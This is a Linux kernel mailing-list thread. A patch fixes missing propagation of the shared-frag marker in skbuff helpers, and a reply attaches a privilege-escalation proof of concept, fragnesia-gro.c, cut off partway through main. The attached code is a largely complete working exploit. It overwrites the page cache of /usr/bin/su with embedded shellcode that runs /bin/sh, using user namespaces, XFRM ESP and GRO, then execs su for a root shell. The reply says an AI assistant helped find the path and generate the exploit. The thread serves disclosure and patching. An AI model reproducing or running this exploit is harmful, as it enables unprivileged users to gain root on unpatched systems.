Linux kernel -stable discussions
* [PATCH net v2] net: skbuff: propagate shared-frag marker through frag-transfer helpers
@ 2026-05-13 21:07 Hyunwoo Kim
  2026-05-14  6:18 ` Sultan Alsawaf
  2026-05-14  8:04 ` Paolo Abeni
  0 siblings, 2 replies; 6+ messages in thread
From: Hyunwoo Kim @ 2026-05-13 21:07 UTC
  To: davem, edumazet, kuba, pabeni, horms, kerneljasonxing, kuniyu,
	mhal, jiayuan.chen, steffen.klassert, vakzz, ben, herbert,
	dsahern
  Cc: netdev, stable, imv4bel

Three frag-transfer helpers (__pskb_copy_fclone(), skb_try_coalesce(),
and skb_shift()) fail to propagate the SKBFL_SHARED_FRAG bit in
skb_shinfo()->flags when moving frags from source to destination.
__pskb_copy_fclone() defers the rest of the shinfo metadata to
skb_copy_header() after copying frag descriptors, but that helper
only carries over gso_{size,segs,type} and never touches
skb_shinfo()->flags; skb_try_coalesce() and skb_shift() move frag
descriptors directly and leave flags untouched.  As a result, the
destination skb keeps a reference to the same externally-owned or
page-cache-backed pages while reporting skb_has_shared_frag() as
false.

The mismatch is harmful in any in-place writer that uses
skb_has_shared_frag() to decide whether shared pages must be detoured
through skb_cow_data().  ESP input is one such writer (esp4.c,
esp6.c), and a single nft 'dup to <local>' rule -- or any other
nf_dup_ipv4() / xt_TEE caller -- is enough to land a pskb_copy()'d
skb in esp_input() with the marker stripped, letting an unprivileged
user write into the page cache of a root-owned read-only file via
authencesn-ESN stray writes.

Set SKBFL_SHARED_FRAG on the destination whenever frag descriptors
were actually moved from the source.  skb_copy() and skb_copy_expand()
share skb_copy_header() too but linearize all paged data into freshly
allocated head storage and emerge with nr_frags == 0, so
skb_has_shared_frag() returns false on its own; they need no change.
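
The propagation rule above can be sketched in userspace. This is only a
minimal model, not kernel code: struct model_shinfo, MODEL_SHARED_FRAG,
model_has_shared_frag() and model_move_frags() are hypothetical stand-ins
for skb_shinfo(), SKBFL_SHARED_FRAG, skb_has_shared_frag() and the
frag-transfer helpers, and the "has frags" test is a simplification of the
kernel's nonlinear check.

```c
#include <assert.h>
#include <stdbool.h>
#include <string.h>

/* Hypothetical userspace stand-ins; NOT the kernel's definitions. */
#define MODEL_SHARED_FRAG (1u << 0)   /* plays the role of SKBFL_SHARED_FRAG */
#define MODEL_MAX_FRAGS   8

struct model_shinfo {
	unsigned int flags;
	unsigned int nr_frags;
	int frags[MODEL_MAX_FRAGS];   /* opaque page handles in this model */
};

/* Simplified analogue of skb_has_shared_frag(): frags exist and marker set. */
static bool model_has_shared_frag(const struct model_shinfo *s)
{
	return s->nr_frags > 0 && (s->flags & MODEL_SHARED_FRAG);
}

/*
 * Append all frag descriptors of 'from' to 'to'. When 'propagate' is true,
 * carry the shared-frag marker over, but only if descriptors were actually
 * moved. Returns the number of descriptors moved, or -1 if they do not fit.
 */
static int model_move_frags(struct model_shinfo *to,
			    const struct model_shinfo *from, bool propagate)
{
	assert(to && from);

	if (to->nr_frags + from->nr_frags > MODEL_MAX_FRAGS)
		return -1;

	memcpy(to->frags + to->nr_frags, from->frags,
	       from->nr_frags * sizeof(from->frags[0]));
	to->nr_frags += from->nr_frags;

	if (propagate && from->nr_frags)
		to->flags |= from->flags & MODEL_SHARED_FRAG;

	return (int)from->nr_frags;
}
```

With propagate == false the destination ends up holding the source's frags
while model_has_shared_frag() still returns false, which is the mismatch
described above; with propagate == true the marker follows the frags.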

Fixes: cef401de7be8 ("net: fix possible wrong checksum generation")
Fixes: f4c50a4034e6 ("xfrm: esp: avoid in-place decrypt on shared skb frags")
Reported-by: William Bowling <vakzz@zellic.io>
Reported-by: Hyunwoo Kim <imv4bel@gmail.com>
Cc: stable@vger.kernel.org
Signed-off-by: Hyunwoo Kim <imv4bel@gmail.com>
---
Changes in v2:
- Also propagate SHARED_FRAG in skb_shift()
- v1: https://lore.kernel.org/all/agRfuVOeMI5pbHhY@v4bel/
---
 net/core/skbuff.c | 5 +++++
 1 file changed, 5 insertions(+)

diff --git a/net/core/skbuff.c b/net/core/skbuff.c
index 7dad68e3b518..7cd388504297 100644
--- a/net/core/skbuff.c
+++ b/net/core/skbuff.c
@@ -2248,6 +2248,7 @@ struct sk_buff *__pskb_copy_fclone(struct sk_buff *skb, int headroom,
 			skb_frag_ref(skb, i);
 		}
 		skb_shinfo(n)->nr_frags = i;
+		skb_shinfo(n)->flags |= skb_shinfo(skb)->flags & SKBFL_SHARED_FRAG;
 	}
 
 	if (skb_has_frag_list(skb)) {
@@ -4349,6 +4350,8 @@ int skb_shift(struct sk_buff *tgt, struct sk_buff *skb, int shiftlen)
 	tgt->ip_summed = CHECKSUM_PARTIAL;
 	skb->ip_summed = CHECKSUM_PARTIAL;
 
+	skb_shinfo(tgt)->flags |= skb_shinfo(skb)->flags & SKBFL_SHARED_FRAG;
+
 	skb_len_add(skb, -shiftlen);
 	skb_len_add(tgt, shiftlen);
 
@@ -6200,6 +6203,8 @@ bool skb_try_coalesce(struct sk_buff *to, struct sk_buff *from,
 	       from_shinfo->frags,
 	       from_shinfo->nr_frags * sizeof(skb_frag_t));
 	to_shinfo->nr_frags += from_shinfo->nr_frags;
+	if (from_shinfo->nr_frags)
+		to_shinfo->flags |= from_shinfo->flags & SKBFL_SHARED_FRAG;
 
 	if (!skb_cloned(from))
 		from_shinfo->nr_frags = 0;
-- 
2.43.0



* Re: [PATCH net v2] net: skbuff: propagate shared-frag marker through frag-transfer helpers
  2026-05-13 21:07 [PATCH net v2] net: skbuff: propagate shared-frag marker through frag-transfer helpers Hyunwoo Kim
@ 2026-05-14  6:18 ` Sultan Alsawaf
  2026-05-14  9:23   ` Hyunwoo Kim
  2026-05-14  8:04 ` Paolo Abeni
  1 sibling, 1 reply; 6+ messages in thread
From: Sultan Alsawaf @ 2026-05-14  6:18 UTC
  To: Hyunwoo Kim
  Cc: davem, edumazet, kuba, pabeni, horms, kerneljasonxing, kuniyu,
	mhal, jiayuan.chen, steffen.klassert, vakzz, ben, herbert,
	dsahern, netdev, stable

[-- Attachment #1: Type: text/plain, Size: 852 bytes --]

On Thu, May 14, 2026 at 06:07:44AM +0900, Hyunwoo Kim wrote:
> Changes in v2:
> - Also propagate SHARED_FRAG in skb_shift()
> - v1: https://lore.kernel.org/all/agRfuVOeMI5pbHhY@v4bel/

Hi Hyunwoo,

I've been working on mitigating this vulnerability as a member of the kernel
team at CIQ, a distro vendor. In particular, we wanted to make sure that there
weren't any lingering places missing SHARED_FRAG propagation.

To that end, I used Claude to discover that skb_gro_receive() remained unpatched
(as you pointed out in the v1 thread), and then generated a PoC exploiting the
vulnerable skb_gro_receive() path.

The PoC is a modified version of the original fragnesia PoC. It works 100% of
the time, just like the original fragnesia PoC.

I have attached the PoC and a patch that fixes skb_gro_receive(). Please take a
look at them.

Thanks,
Sultan

[-- Attachment #2: fragnesia-gro.c --]
[-- Type: text/plain, Size: 25061 bytes --]

/*
 * fragnesia-gro.c: skb_gro_receive() SKBFL_SHARED_FRAG page-cache corruption PoC
 *
 * Drop-in replacement for the espintcp fragnesia variant, targeting the same
 * bug class (CVE-2026-46300) through the GRO frag-merge path instead of the
 * espintcp path. Copies shell_elf over /usr/bin/su's page cache the same way
 * the original fragnesia does.
 *
 * The exploit splices 17 bytes per round (1 byte ciphertext + 16 byte ICV) so
 * each ESP decrypt corrupts exactly ONE target byte with no collateral damage.
 * A precomputed IV table selects the AES-GCM keystream byte that XORs the
 * current file content to the desired shell_elf byte.
 *
 * Based on the Fragnesia PoC by William Bowling / Hyunwoo Kim.
 *
 * Build:
 *   gcc -O2 -Wall -Wextra -static fragnesia-gro.c -o fragnesia-gro
 *
 * Run (as root):
 *   ./fragnesia-gro
 *
 * Exit codes:
 *   1: vulnerable (page cache mutated through GRO flag-strip path)
 *   0: fixed (byte unchanged)
 *   2: local setup or argument error
 *   4: namespace/veth gate closed
 */

#define _GNU_SOURCE

#include <arpa/inet.h>
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <net/if.h>
#include <netinet/in.h>
#include <sched.h>
#include <signal.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mount.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <time.h>
#include <sys/wait.h>
#include <unistd.h>
#include <linux/bpf.h>
#include <linux/if_addr.h>
#include <linux/if_alg.h>
#include <linux/netlink.h>
#include <linux/xfrm.h>

/* ---- compat defines ---- */

#ifndef NLA_ALIGNTO
#define NLA_ALIGNTO 4
#endif
#define NLA_ALIGN(len)  (((len) + NLA_ALIGNTO - 1) & ~(NLA_ALIGNTO - 1))
#ifndef NLA_HDRLEN
#define NLA_HDRLEN      ((int)NLA_ALIGN(sizeof(struct nlattr)))
#endif
#ifndef RTM_NEWLINK
#define RTM_NEWLINK 16
#endif
#ifndef RTM_NEWADDR
#define RTM_NEWADDR 20
#endif
#ifndef NETLINK_ROUTE
#define NETLINK_ROUTE 0
#endif
#ifndef NETLINK_XFRM
#define NETLINK_XFRM 6
#endif
#ifndef IFLA_IFNAME
#define IFLA_IFNAME 3
#endif
#ifndef IFLA_LINKINFO
#define IFLA_LINKINFO 18
#endif
#ifndef IFLA_INFO_KIND
#define IFLA_INFO_KIND 1
#endif
#ifndef IFLA_INFO_DATA
#define IFLA_INFO_DATA 2
#endif
#ifndef VETH_INFO_PEER
#define VETH_INFO_PEER 1
#endif
#ifndef IFLA_NET_NS_PID
#define IFLA_NET_NS_PID 19
#endif
#ifndef IFA_LOCAL
#define IFA_LOCAL 2
#endif
#ifndef IFA_ADDRESS
#define IFA_ADDRESS 1
#endif
#ifndef NLA_F_NESTED
#define NLA_F_NESTED (1 << 15)
#endif
#ifndef ETHTOOL_SGRO
#define ETHTOOL_SGRO 0x0000002c
#endif
#ifndef ETHTOOL_STSO
#define ETHTOOL_STSO 0x0000001f
#endif
#ifndef ETHTOOL_SGSO
#define ETHTOOL_SGSO 0x00000024
#endif
#ifndef SIOCETHTOOL
#define SIOCETHTOOL 0x8946
#endif
#ifndef UDP_ENCAP
#define UDP_ENCAP 100
#endif
#ifndef UDP_ENCAP_ESPINUDP
#define UDP_ENCAP_ESPINUDP 2
#endif
#ifndef UDP_GRO
#define UDP_GRO 104
#endif
#ifndef UDP_CORK
#define UDP_CORK 1
#endif
#ifndef AF_ALG
#define AF_ALG 38
#endif
#ifndef SOL_ALG
#define SOL_ALG 279
#endif
#ifndef ALG_SET_KEY
#define ALG_SET_KEY 1
#endif
#ifndef ALG_SET_OP
#define ALG_SET_OP 3
#endif
#ifndef ALG_OP_ENCRYPT
#define ALG_OP_ENCRYPT 1
#endif
#ifndef IFLA_XDP
#define IFLA_XDP 43
#endif
#ifndef IFLA_XDP_FD
#define IFLA_XDP_FD 1
#endif
#ifndef IFLA_XDP_FLAGS
#define IFLA_XDP_FLAGS 3
#endif
#ifndef XDP_FLAGS_SKB_MODE
#define XDP_FLAGS_SKB_MODE (1U << 1)
#endif

struct rtnl_ifinfomsg {
	unsigned char  ifi_family;
	unsigned char  __ifi_pad;
	unsigned short ifi_type;
	int            ifi_index;
	unsigned int   ifi_flags;
	unsigned int   ifi_change;
};

/* ---- constants ---- */

#define VETH0       "veth0"
#define VETH1       "veth1"
#define ADDR_SRC    "10.0.0.1"
#define ADDR_DST    "10.0.0.2"
#define UDP_PORT    4500
#define ESP_SPI     0x100
#define ICV_LEN     16
#define PAYLOAD_LEN 192
/*
 * Splice exactly 17 bytes per round: rfc4106 shifts the 8-byte IV into
 * the AAD, so the inner GCM sees SPLICE_LEN bytes of ciphertext. With
 * SPLICE_LEN - ICV_LEN = 1, exactly one frag byte is decrypted.
 */
#define SPLICE_LEN  (1 + ICV_LEN)

static const unsigned char xfrm_key[20] = {
	0x00, 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77,
	0x88, 0x99, 0xaa, 0xbb, 0xcc, 0xdd, 0xee, 0xff,
	0x01, 0x02, 0x03, 0x04
};

static const uint8_t shell_elf[PAYLOAD_LEN] = {
	0x7f,0x45,0x4c,0x46,0x02,0x01,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
	0x02,0x00,0x3e,0x00,0x01,0x00,0x00,0x00,0x78,0x00,0x40,0x00,0x00,0x00,0x00,0x00,
	0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
	0x00,0x00,0x00,0x00,0x40,0x00,0x38,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
	0x01,0x00,0x00,0x00,0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
	0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,
	0xb8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xb8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
	0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x31,0xff,0x31,0xf6,0x31,0xc0,0xb0,0x6a,
	0x0f,0x05,0xb0,0x69,0x0f,0x05,0xb0,0x74,0x0f,0x05,0x6a,0x00,0x48,0x8d,0x05,0x12,
	0x00,0x00,0x00,0x50,0x48,0x89,0xe2,0x48,0x8d,0x3d,0x12,0x00,0x00,0x00,0x31,0xf6,
	0x6a,0x3b,0x58,0x0f,0x05,0x54,0x45,0x52,0x4d,0x3d,0x78,0x74,0x65,0x72,0x6d,0x00,
	0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
};

static const char *target_file = "/usr/bin/su";

/* ---- utility ---- */

static void die(const char *w) { fprintf(stderr, "%s: %s\n", w, strerror(errno)); exit(2); }
static void gate_fail(const char *w) { fprintf(stderr, "gate_closed: %s: %s\n", w, strerror(errno)); exit(4); }

static void store_be32(unsigned char *p, uint32_t v)
{
	p[0] = v >> 24; p[1] = v >> 16; p[2] = v >> 8; p[3] = v;
}

static void sync_write(int fd) { unsigned char b = 1; if (write(fd, &b, 1) != 1) die("sync_write"); }
static void sync_read(int fd)  { unsigned char b; if (read(fd, &b, 1) != 1) die("sync_read"); }

static unsigned char read_byte_at(int fd, off_t off)
{
	unsigned char b;
	if (pread(fd, &b, 1, off) != 1) die("pread");
	return b;
}

/* ---- netlink helpers ---- */

static int nl_ack_errno(char *buf, ssize_t len)
{
	struct nlmsghdr *nlh;
	for (nlh = (struct nlmsghdr *)buf; NLMSG_OK(nlh, (unsigned int)len);
	     nlh = NLMSG_NEXT(nlh, len)) {
		if (nlh->nlmsg_type == NLMSG_ERROR) {
			struct nlmsgerr *e = (struct nlmsgerr *)NLMSG_DATA(nlh);
			if (e->error == 0) return 0;
			errno = -e->error;
			return -1;
		}
	}
	errno = EPROTO;
	return -1;
}

static void add_nlattr(struct nlmsghdr *nlh, size_t max,
		       unsigned short type, const void *data, size_t len)
{
	size_t off = NLMSG_ALIGN(nlh->nlmsg_len);
	struct nlattr *nla = (struct nlattr *)((char *)nlh + off);
	if (off + NLA_HDRLEN + len > max) { fprintf(stderr, "nlmsg overflow\n"); exit(2); }
	nla->nla_type = type;
	nla->nla_len = NLA_HDRLEN + len;
	memcpy((char *)nla + NLA_HDRLEN, data, len);
	nlh->nlmsg_len = off + NLA_ALIGN(nla->nla_len);
}

static struct nlattr *nest_begin(struct nlmsghdr *nlh, size_t max, unsigned short type)
{
	size_t off = NLMSG_ALIGN(nlh->nlmsg_len);
	struct nlattr *nla = (struct nlattr *)((char *)nlh + off);
	if (off + NLA_HDRLEN > max) { fprintf(stderr, "nlmsg overflow\n"); exit(2); }
	nla->nla_type = type;
	nla->nla_len = NLA_HDRLEN;
	nlh->nlmsg_len = off + NLA_HDRLEN;
	return nla;
}

static void nest_end(struct nlmsghdr *nlh, struct nlattr *nla)
{
	nla->nla_len = (unsigned short)((char *)nlh + NLMSG_ALIGN(nlh->nlmsg_len) - (char *)nla);
}

static void nl_talk(struct nlmsghdr *nlh, int proto, const char *label)
{
	struct sockaddr_nl sa = { .nl_family = AF_NETLINK };
	char resp[4096];
	int fd = socket(AF_NETLINK, SOCK_RAW | SOCK_CLOEXEC, proto);
	if (fd < 0) gate_fail(label);
	if (bind(fd, (struct sockaddr *)&sa, sizeof(sa)) < 0) gate_fail(label);
	memset(&sa, 0, sizeof(sa));
	sa.nl_family = AF_NETLINK;
	if (sendto(fd, nlh, nlh->nlmsg_len, 0, (struct sockaddr *)&sa, sizeof(sa)) < 0) gate_fail(label);
	ssize_t r = recv(fd, resp, sizeof(resp), 0);
	if (r < 0 || nl_ack_errno(resp, r) < 0) gate_fail(label);
	close(fd);
}

/* ---- network setup ---- */

static void if_up(const char *name)
{
	struct ifreq ifr = {};
	int fd = socket(AF_INET, SOCK_DGRAM | SOCK_CLOEXEC, 0);
	if (fd < 0) gate_fail("socket");
	strncpy(ifr.ifr_name, name, IFNAMSIZ - 1);
	if (ioctl(fd, SIOCGIFFLAGS, &ifr) < 0) gate_fail(name);
	ifr.ifr_flags |= IFF_UP;
	if (ioctl(fd, SIOCSIFFLAGS, &ifr) < 0) gate_fail(name);
	close(fd);
}

static void create_veth(void)
{
	char buf[4096] = {};
	struct nlmsghdr *nlh = (struct nlmsghdr *)buf;
	nlh->nlmsg_len = NLMSG_LENGTH(sizeof(struct rtnl_ifinfomsg));
	nlh->nlmsg_type = RTM_NEWLINK;
	nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE | NLM_F_EXCL;
	((struct rtnl_ifinfomsg *)NLMSG_DATA(nlh))->ifi_family = AF_UNSPEC;
	add_nlattr(nlh, sizeof(buf), IFLA_IFNAME, VETH0, strlen(VETH0) + 1);
	struct nlattr *li = nest_begin(nlh, sizeof(buf), IFLA_LINKINFO | NLA_F_NESTED);
	add_nlattr(nlh, sizeof(buf), IFLA_INFO_KIND, "veth", 5);
	struct nlattr *id = nest_begin(nlh, sizeof(buf), IFLA_INFO_DATA | NLA_F_NESTED);
	struct nlattr *pn = nest_begin(nlh, sizeof(buf), VETH_INFO_PEER | NLA_F_NESTED);
	{ size_t o = NLMSG_ALIGN(nlh->nlmsg_len);
	  memset((char *)nlh + o, 0, sizeof(struct rtnl_ifinfomsg));
	  nlh->nlmsg_len = o + sizeof(struct rtnl_ifinfomsg); }
	add_nlattr(nlh, sizeof(buf), IFLA_IFNAME, VETH1, strlen(VETH1) + 1);
	nest_end(nlh, pn); nest_end(nlh, id); nest_end(nlh, li);
	nl_talk(nlh, NETLINK_ROUTE, "create veth");
}

static void move_to_netns(const char *name, pid_t pid)
{
	char buf[4096] = {};
	struct nlmsghdr *nlh = (struct nlmsghdr *)buf;
	uint32_t ns_pid = (uint32_t)pid;
	unsigned int idx = if_nametoindex(name);
	if (!idx) gate_fail("if_nametoindex");
	nlh->nlmsg_len = NLMSG_LENGTH(sizeof(struct rtnl_ifinfomsg));
	nlh->nlmsg_type = RTM_NEWLINK;
	nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;
	((struct rtnl_ifinfomsg *)NLMSG_DATA(nlh))->ifi_family = AF_UNSPEC;
	((struct rtnl_ifinfomsg *)NLMSG_DATA(nlh))->ifi_index = (int)idx;
	add_nlattr(nlh, sizeof(buf), IFLA_NET_NS_PID, &ns_pid, sizeof(ns_pid));
	nl_talk(nlh, NETLINK_ROUTE, "move veth");
}

static void add_addr(const char *name, const char *addr)
{
	char buf[4096] = {};
	struct nlmsghdr *nlh = (struct nlmsghdr *)buf;
	struct in_addr a;
	unsigned int idx = if_nametoindex(name);
	if (!idx) gate_fail("if_nametoindex");
	inet_pton(AF_INET, addr, &a);
	nlh->nlmsg_len = NLMSG_LENGTH(sizeof(struct ifaddrmsg));
	nlh->nlmsg_type = RTM_NEWADDR;
	nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE | NLM_F_EXCL;
	struct ifaddrmsg *ifa = (struct ifaddrmsg *)NLMSG_DATA(nlh);
	ifa->ifa_family = AF_INET;
	ifa->ifa_prefixlen = 24;
	ifa->ifa_index = idx;
	add_nlattr(nlh, sizeof(buf), IFA_LOCAL, &a, sizeof(a));
	add_nlattr(nlh, sizeof(buf), IFA_ADDRESS, &a, sizeof(a));
	nl_talk(nlh, NETLINK_ROUTE, "add addr");
}

static void ethtool_set(const char *name, uint32_t cmd, uint32_t data)
{
	struct ifreq ifr = {};
	struct { uint32_t cmd; uint32_t data; } val = { cmd, data };
	int fd = socket(AF_INET, SOCK_DGRAM | SOCK_CLOEXEC, 0);
	if (fd < 0) return;
	strncpy(ifr.ifr_name, name, IFNAMSIZ - 1);
	ifr.ifr_data = (void *)&val;
	ioctl(fd, SIOCETHTOOL, &ifr);
	close(fd);
}

/* ---- XDP attach/detach for NAPI init ---- */

static void xdp_toggle(const char *name, int prog_fd, uint32_t flags)
{
	char buf[4096] = {};
	struct nlmsghdr *nlh = (struct nlmsghdr *)buf;
	unsigned int idx = if_nametoindex(name);
	if (!idx) return;
	nlh->nlmsg_len = NLMSG_LENGTH(sizeof(struct rtnl_ifinfomsg));
	nlh->nlmsg_type = RTM_NEWLINK;
	nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;
	((struct rtnl_ifinfomsg *)NLMSG_DATA(nlh))->ifi_family = AF_UNSPEC;
	((struct rtnl_ifinfomsg *)NLMSG_DATA(nlh))->ifi_index = (int)idx;
	struct nlattr *x = nest_begin(nlh, sizeof(buf), IFLA_XDP | NLA_F_NESTED);
	add_nlattr(nlh, sizeof(buf), IFLA_XDP_FD, &prog_fd, sizeof(prog_fd));
	add_nlattr(nlh, sizeof(buf), IFLA_XDP_FLAGS, &flags, sizeof(flags));
	nest_end(nlh, x);
	nl_talk(nlh, NETLINK_ROUTE, "xdp");
}

static void enable_veth_napi(const char *name)
{
	struct bpf_insn { uint8_t code; uint8_t regs; int16_t off; int32_t imm; };
	struct bpf_insn prog[] = { { 0xb7, 0, 0, 2 }, { 0x95, 0, 0, 0 } };
	struct { uint32_t t; uint32_t c; uint64_t i; uint64_t l;
		 uint32_t a,b; uint64_t d; uint32_t e,f; char n[16]; } attr = {};
	static const char lic[] = "GPL";
	attr.t = 6; attr.c = 2;
	attr.i = (uint64_t)(unsigned long)prog;
	attr.l = (uint64_t)(unsigned long)lic;
	int fd = (int)syscall(__NR_bpf, 5, &attr, sizeof(attr));
	if (fd < 0) return;
	xdp_toggle(name, fd, XDP_FLAGS_SKB_MODE);
	close(fd);
	int m1 = -1;
	xdp_toggle(name, m1, XDP_FLAGS_SKB_MODE);
}

/* ---- user namespace ---- */

static void setup_userns(void)
{
	uid_t uid = getuid();
	gid_t gid = getgid();
	int rp[2], mp[2];
	if (pipe(rp) < 0 || pipe(mp) < 0) die("pipe");
	pid_t c = fork();
	if (c < 0) die("fork");
	if (c == 0) {
		char path[64], map[64]; pid_t pp = getppid();
		close(rp[1]); close(mp[0]); sync_read(rp[0]);
		snprintf(path, sizeof(path), "/proc/%d/setgroups", pp);
		int fd = open(path, O_WRONLY); if (fd >= 0) { write(fd, "deny", 4); close(fd); }
		snprintf(path, sizeof(path), "/proc/%d/uid_map", pp);
		snprintf(map, sizeof(map), "0 %u 1\n", uid);
		fd = open(path, O_WRONLY); if (fd >= 0) { write(fd, map, strlen(map)); close(fd); }
		snprintf(path, sizeof(path), "/proc/%d/gid_map", pp);
		snprintf(map, sizeof(map), "0 %u 1\n", gid);
		fd = open(path, O_WRONLY); if (fd >= 0) { write(fd, map, strlen(map)); close(fd); }
		sync_write(mp[1]); _exit(0);
	}
	close(rp[0]); close(mp[1]);
	if (unshare(CLONE_NEWUSER) < 0) gate_fail("unshare(CLONE_NEWUSER)");
	sync_write(rp[1]); sync_read(mp[0]); waitpid(c, NULL, 0);
	setresgid(0, 0, 0); setresuid(0, 0, 0);
}

/* ---- XFRM SA ---- */

static void add_sa(void)
{
	char buf[4096] = {};
	char ab[sizeof(struct xfrm_algo_aead) + sizeof(xfrm_key)];
	struct nlmsghdr *nlh = (struct nlmsghdr *)buf;
	nlh->nlmsg_len = NLMSG_LENGTH(sizeof(struct xfrm_usersa_info));
	nlh->nlmsg_type = XFRM_MSG_NEWSA;
	nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;
	struct xfrm_usersa_info *xs = (struct xfrm_usersa_info *)NLMSG_DATA(nlh);
	xs->sel.family = AF_INET;
	inet_pton(AF_INET, ADDR_SRC, &xs->saddr.a4);
	inet_pton(AF_INET, ADDR_DST, &xs->id.daddr.a4);
	xs->id.spi = htonl(ESP_SPI); xs->id.proto = IPPROTO_ESP;
	xs->family = AF_INET; xs->mode = XFRM_MODE_TRANSPORT; xs->replay_window = 0;
	xs->lft.soft_byte_limit = xs->lft.hard_byte_limit = XFRM_INF;
	xs->lft.soft_packet_limit = xs->lft.hard_packet_limit = XFRM_INF;
	memset(ab, 0, sizeof(ab));
	struct xfrm_algo_aead *a = (struct xfrm_algo_aead *)ab;
	strcpy(a->alg_name, "rfc4106(gcm(aes))");
	a->alg_key_len = sizeof(xfrm_key) * 8;
	a->alg_icv_len = ICV_LEN * 8;
	memcpy(a->alg_key, xfrm_key, sizeof(xfrm_key));
	add_nlattr(nlh, sizeof(buf), XFRMA_ALG_AEAD, ab, sizeof(ab));
	struct xfrm_encap_tmpl encap = {};
	encap.encap_type = UDP_ENCAP_ESPINUDP;
	encap.encap_sport = htons(UDP_PORT);
	encap.encap_dport = htons(UDP_PORT);
	add_nlattr(nlh, sizeof(buf), XFRMA_ENCAP, &encap, sizeof(encap));
	nl_talk(nlh, NETLINK_XFRM, "add SA");
}

/* ---- AES-GCM keystream ---- */

static void aes_ecb_block(int alg_fd, const unsigned char in[16], unsigned char out[16])
{
	char cb[CMSG_SPACE(sizeof(uint32_t))] = {};
	struct iovec iov = { (void *)in, 16 };
	struct msghdr msg = { .msg_iov = &iov, .msg_iovlen = 1, .msg_control = cb, .msg_controllen = sizeof(cb) };
	uint32_t op = ALG_OP_ENCRYPT;
	struct cmsghdr *cm = CMSG_FIRSTHDR(&msg);
	cm->cmsg_level = SOL_ALG; cm->cmsg_type = ALG_SET_OP;
	cm->cmsg_len = CMSG_LEN(sizeof(op));
	memcpy(CMSG_DATA(cm), &op, sizeof(op));
	int ofd = accept4(alg_fd, NULL, NULL, SOCK_CLOEXEC);
	if (ofd < 0) die("AF_ALG accept");
	if (sendmsg(ofd, &msg, 0) != 16) die("AF_ALG send");
	if (read(ofd, out, 16) != 16) die("AF_ALG read");
	close(ofd);
}

/*
 * rfc4106 shifts the 8-byte ESP IV into the AAD, so the inner GCM
 * ciphertext starts at frag byte 0. The target byte is at CTR position 0.
 */
#define KS_POS 0

static uint16_t stream_nonce[256];
static bool stream_have[256];

static void build_stream_table(void)
{
	struct sockaddr_alg sa = { .salg_family = AF_ALG };
	strcpy((char *)sa.salg_type, "skcipher");
	strcpy((char *)sa.salg_name, "ecb(aes)");
	int fd = socket(AF_ALG, SOCK_SEQPACKET | SOCK_CLOEXEC, 0);
	if (fd < 0) die("AF_ALG");
	if (bind(fd, (struct sockaddr *)&sa, sizeof(sa)) < 0) die("AF_ALG bind");
	if (setsockopt(fd, SOL_ALG, ALG_SET_KEY, xfrm_key, 16) < 0) die("AF_ALG key");

	unsigned int count = 0;
	for (unsigned nonce = 0; nonce <= 0xffff && count < 256; nonce++) {
		unsigned char iv[8], cb[16], out[16];
		memset(iv, 0xcc, sizeof(iv));
		store_be32(iv + 4, nonce);
		memcpy(cb, &xfrm_key[16], 4);
		memcpy(cb + 4, iv, 8);
		store_be32(cb + 12, 2 + KS_POS / 16);
		aes_ecb_block(fd, cb, out);
		unsigned char b = out[KS_POS % 16];
		if (stream_have[b]) continue;
		stream_have[b] = true;
		stream_nonce[b] = (uint16_t)nonce;
		count++;
	}
	close(fd);
	if (count < 256) { fprintf(stderr, "incomplete stream table: %u/256\n", count); exit(2); }
}

/* ---- main ---- */

int main(void)
{
	setvbuf(stdout, NULL, _IONBF, 0);

	printf("[*] uid=%d euid=%d gid=%d egid=%d\n",
	       getuid(), geteuid(), getgid(), getegid());
	printf("[*] mode=gro_espinudp_pagecache_replace\n\n");

	struct stat st;
	if (stat(target_file, &st) < 0 || !S_ISREG(st.st_mode) || st.st_size < PAYLOAD_LEN + SPLICE_LEN)
		die("stat target");

	printf("[*] target=%s size=%lld\n", target_file, (long long)st.st_size);

	build_stream_table();
	printf("[*] stream_table=256 entries at ciphertext position %d\n", KS_POS);

	/*
	 * Fork before entering the user namespace. The child enters the
	 * user/net namespace and does all the page-cache corruption. The
	 * parent stays in the init user namespace so that execve() of the
	 * corrupted setuid su binary honors the setuid bit, giving a real
	 * root shell rather than a fake namespace-root shell.
	 */
	fflush(stdout); fflush(stderr);
	pid_t worker = fork();
	if (worker < 0) die("fork worker");
	if (worker > 0) {
		int wstatus;
		waitpid(worker, &wstatus, 0);
		if (WIFEXITED(wstatus) && WEXITSTATUS(wstatus) == 1) {
			char *argv[] = { (char *)target_file, NULL };
			char *envp[] = { NULL };
			execve(target_file, argv, envp);
		}
		return WIFEXITED(wstatus) ? WEXITSTATUS(wstatus) : 2;
	}

	/* Child: enter user namespace and do the corruption */
	if (getuid() != 0) setup_userns();
	if (unshare(CLONE_NEWNET) < 0) gate_fail("unshare(CLONE_NEWNET)");
	if_up("lo");
	create_veth();

	int p_ns[2], p_veth[2], p_rdy[2];
	if (pipe(p_ns) < 0 || pipe(p_veth) < 0 || pipe(p_rdy) < 0) die("pipe");
	fflush(stdout); fflush(stderr);

	pid_t rx = fork();
	if (rx < 0) die("fork");

	if (rx == 0) {
